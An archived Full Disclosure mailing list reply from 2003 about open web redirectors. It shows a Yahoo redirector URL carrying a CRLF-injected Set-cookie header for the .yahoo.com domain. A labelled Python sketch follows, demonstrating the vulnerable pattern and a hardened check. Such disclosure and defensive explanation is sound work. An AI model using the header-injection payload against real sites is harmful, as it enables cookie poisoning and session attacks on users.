Full Disclosure mailing list archives

Re: CERT: Vulnerability in web redirectors


From: David Leadbeater <dgl () dgl cx>
Date: Sat, 22 Mar 2003 21:19:16 +0000

Georgi Guninski wrote:
Like this one?:
--------------------
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org
--------------------
(may be wrapped)

That site also demonstrates another issue with this type of HTTP Redirector
that has been mentioned as a security risk before:
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org%0D%0ASet-cookie:%20foo%3D123%3B%%20domain%3D.yahoo.com%3B%20path%3D/

It adds a cookie for the whole .yahoo.com domain; this could be an attack
vector for other XSS (I wouldn't be surprised if there is less checking
done on cookie input) or session poisoning type attacks.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
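
Added example, not part of the original message or of any redirector's real code: a minimal Python sketch of why a percent-decoded redirect target copied into a Location header yields a second header line, next to a hardened form that rejects control characters. The hosts, the sample paths and all function names are constructed for illustration; the `/*` marker follows the URL shape quoted above.

```python
from urllib.parse import unquote, urlsplit

# Constructed request paths in the same shape as the redirector URL above;
# target.example and .example are placeholder names, not real hosts.
SAMPLE = ("/S=1/R=1/*http://target.example%0D%0ASet-cookie:%20foo%3D123%3B"
          "%20domain%3D.example%3B%20path%3D/")
CLEAN = "/S=1/R=1/*http://target.example/page"


def extract_target(path):
    """Return the percent-decoded text after the '/*' marker."""
    _, sep, raw = path.partition("/*")
    if not sep:
        raise ValueError("no redirect target")
    return unquote(raw)


def naive_response(path):
    """Vulnerable pattern: decoded target copied straight into Location."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + extract_target(path) + "\r\n\r\n")


def header_names(response):
    """Header names a client would parse from the response head."""
    head = response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0].lower() for line in head.split("\r\n")[1:]]


def safe_response(path):
    """Hardened pattern: refuse control characters and non-http(s) targets."""
    target = extract_target(path)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        raise ValueError("control character in redirect target")
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("redirect target must be an absolute http(s) URL")
    return "HTTP/1.1 302 Found\r\nLocation: " + target + "\r\n\r\n"


if __name__ == "__main__":
    print(header_names(naive_response(SAMPLE)))  # headers parsed by a client
    try:
        safe_response(SAMPLE)
    except ValueError as exc:
        print("rejected:", exc)
```

The control-character check runs on the decoded value, because that is the form that reaches the response header.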

